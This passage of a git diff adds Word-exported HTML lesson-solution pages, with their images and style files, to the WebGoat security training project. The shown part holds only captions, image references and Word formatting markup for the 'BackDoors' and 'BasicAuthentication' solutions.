+ <v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image009.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/BackDoors_files/image017.jpg" v:shapes="Picture_x0020_151"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Insert trigger</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_152" o:spid="_x0000_i1025"
+ type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image011.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/BackDoors_files/image018.jpg" v:shapes="Picture_x0020_152"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>6</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson completed</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/BackDoors_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/BackDoors_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/BackDoors_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/BackDoors_files/filelist.xml b/main/project/WebContent/lesson_solutions/BackDoors_files/filelist.xml
new file mode 100644
index 000000000..0c8218170
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/BackDoors_files/filelist.xml
@@ -0,0 +1,18 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../BackDoors.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image013.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image014.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image015.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image016.jpg"/>
+ <o:File HRef="image009.png"/>
+ <o:File HRef="image017.jpg"/>
+ <o:File HRef="image011.png"/>
+ <o:File HRef="image018.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/BackDoors_files/image001.png b/main/project/WebContent/lesson_solutions/BackDoors_files/image001.png
new file mode 100644
index 000000000..5a4d94ac7
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BackDoors_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/BackDoors_files/image003.png b/main/project/WebContent/lesson_solutions/BackDoors_files/image003.png
new file mode 100644
index 000000000..8150275d8
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BackDoors_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/BackDoors_files/image005.png b/main/project/WebContent/lesson_solutions/BackDoors_files/image005.png
new file mode 100644
index 000000000..62ebf88f6
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BackDoors_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/BackDoors_files/image007.png b/main/project/WebContent/lesson_solutions/BackDoors_files/image007.png
new file mode 100644
index 000000000..9960dbc61
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BackDoors_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/BackDoors_files/image009.png b/main/project/WebContent/lesson_solutions/BackDoors_files/image009.png
new file mode 100644
index 000000000..be39f6ac3
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BackDoors_files/image009.png differ
diff --git a/main/project/WebContent/lesson_solutions/BackDoors_files/image011.png b/main/project/WebContent/lesson_solutions/BackDoors_files/image011.png
new file mode 100644
index 000000000..ef6e16606
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BackDoors_files/image011.png differ
diff --git a/main/project/WebContent/lesson_solutions/BackDoors_files/image013.jpg b/main/project/WebContent/lesson_solutions/BackDoors_files/image013.jpg
new file mode 100644
index 000000000..c25f12992
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BackDoors_files/image013.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BackDoors_files/image014.jpg b/main/project/WebContent/lesson_solutions/BackDoors_files/image014.jpg
new file mode 100644
index 000000000..08f893f3d
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BackDoors_files/image014.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BackDoors_files/image015.jpg b/main/project/WebContent/lesson_solutions/BackDoors_files/image015.jpg
new file mode 100644
index 000000000..08c662842
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BackDoors_files/image015.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BackDoors_files/image016.jpg b/main/project/WebContent/lesson_solutions/BackDoors_files/image016.jpg
new file mode 100644
index 000000000..9299a4a2f
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BackDoors_files/image016.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BackDoors_files/image017.jpg b/main/project/WebContent/lesson_solutions/BackDoors_files/image017.jpg
new file mode 100644
index 000000000..49760e726
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BackDoors_files/image017.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BackDoors_files/image018.jpg b/main/project/WebContent/lesson_solutions/BackDoors_files/image018.jpg
new file mode 100644
index 000000000..735ea196b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BackDoors_files/image018.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BackDoors_files/themedata.thmx b/main/project/WebContent/lesson_solutions/BackDoors_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BackDoors_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/BasicAuthentication.html b/main/project/WebContent/lesson_solutions/BasicAuthentication.html
new file mode 100644
index 000000000..f129f30c8
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/BasicAuthentication.html
@@ -0,0 +1,932 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/BasicAuthentication_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/BasicAuthentication_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>26</o:TotalTime>
+  <o:Created>2007-07-11T10:55:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:24:00Z</o:LastSaved>
+  <o:Pages>4</o:Pages>
+  <o:Words>609</o:Words>
+  <o:Characters>3474</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>28</o:Lines>
+  <o:Paragraphs>8</o:Paragraphs>
+  <o:CharactersWithSpaces>4075</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/BasicAuthentication_files/themedata.thmx">
+<link rel=colorSchemeMapping
+href="/WebGoat/lesson_solutions/BasicAuthentication_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
